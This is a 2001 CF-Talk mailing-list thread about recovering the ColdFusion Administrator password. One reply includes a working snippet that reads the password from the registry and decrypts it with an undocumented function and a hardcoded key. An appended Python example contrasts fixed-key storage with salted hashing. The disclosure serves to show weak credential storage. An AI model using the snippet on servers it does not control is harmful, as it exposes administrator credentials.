Todd,

It's very easy to retrieve the admin password, and I'm sure I will get
flamed for showing this, but what the hell:

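<!--- Key passed to the undocumented CFusion_Decrypt() function --->
<CFSET CFKey = "4p0L@r1$">

<!--- Read the stored administrator password value from the registry --->
<CFREGISTRY ACTION=GET
      Branch="HKEY_LOCAL_MACHINE\SOFTWARE\Allaire\ColdFusion\CurrentVersion\Server"
      Entry="AdminPassword"
      Variable="AdminPassword">

<CFOUTPUT>
      Registry Password: #CFusion_Decrypt(AdminPassword, CFKey)#
</CFOUTPUT>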

The key to decrypt it spells "4 Polaris" (Allaire inside joke?) -- this
isn't my doing; rather, I was sent this from an anonymous source via the
[EMAIL PROTECTED] address. I hope this will show Allaire and ISPs that
there is a need for encryption, not encoding, for things such as this. I am
against template encryption personally, but the administrator feature should
have much better security. We live and learn, strive and yearn.

Dain Anderson
Caretaker, CF Comet
http://www.cfcomet.com/


----- Original Message -----
From: "Todd Ashworth" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, March 09, 2001 5:31 PM
Subject: Re: Finding the CF Administrator password


> Excellent.  What they are talking about looks like what might be in the
> registry.  This might just do what I want.  If so, that's 2 I owe ya ;)
>
> Todd Ashworth --
> Web Application Developer
> Network Administrator
>
> Saber Corporation
> 314 Oakland Ave.
> Rock Hill, SC 29730
> (803) 327-0137 [111]
>
> ----- Original Message -----
> From: "Jon Hall" <[EMAIL PROTECTED]>
> To: "CF-Talk" <[EMAIL PROTECTED]>
> Sent: Friday, March 09, 2001 5:22 PM
> Subject: Re: Finding the CF Administrator password
>
>
> | Check this link Todd.
> | http://www.fusionauthority.com/alert/index.cfm?alertid=6#Tech1
> |
> | There are undocumented "Administrator" functions called
> | CFusion_Encrypt()/CFusion_Decrypt.
> | These are probably the functions that were used to encrypt the string...
> |
> | jon
>
>
>
>
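
The storage problem discussed in this thread, as an added example that is not part of the original messages and is not ColdFusion's code: a stored password protected with a key that ships in every install is recoverable by anyone who can read the store, while a salted one-way record can only be verified. The XOR routine is a constructed stand-in (not the CFusion_Encrypt algorithm), and `PRODUCT_KEY`, the record format and the function names are assumptions made for illustration.

```python
import hashlib
import hmac
import os

# Reversible scheme: constructed toy cipher with a placeholder key that would
# be identical in every installation of the product.
PRODUCT_KEY = b"example-fixed-key"

def obfuscate(password: str, key: bytes = PRODUCT_KEY) -> bytes:
    data = password.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def deobfuscate(blob: bytes, key: bytes = PRODUCT_KEY) -> str:
    # Anyone holding the shipped key and read access to the store gets the password.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(blob)).decode()

# One-way scheme: per-install random salt plus a slow key-derivation function.
ITERATIONS = 600_000  # assumed work factor; tune for the host

def make_record(password: str, iterations: int = ITERATIONS) -> str:
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2-sha256${iterations}${salt.hex()}${digest.hex()}"

def verify(password: str, record: str) -> bool:
    try:
        scheme, iterations, salt_hex, digest_hex = record.split("$")
        if scheme != "pbkdf2-sha256":
            return False
        salt, expected = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
        candidate = hashlib.pbkdf2_hmac(
            "sha256", password.encode(), salt, int(iterations))
    except ValueError:
        return False  # malformed or truncated record
    # Constant-time comparison avoids leaking how many bytes matched.
    return hmac.compare_digest(candidate, expected)

if __name__ == "__main__":
    stored = obfuscate("constructed-admin-pw")          # constructed sample value
    print("reversible store yields:", deobfuscate(stored))
    record = make_record("constructed-admin-pw")
    print("one-way record:", record)
    print("correct password verifies:", verify("constructed-admin-pw", record))
    print("wrong password verifies:", verify("guess", record))
```
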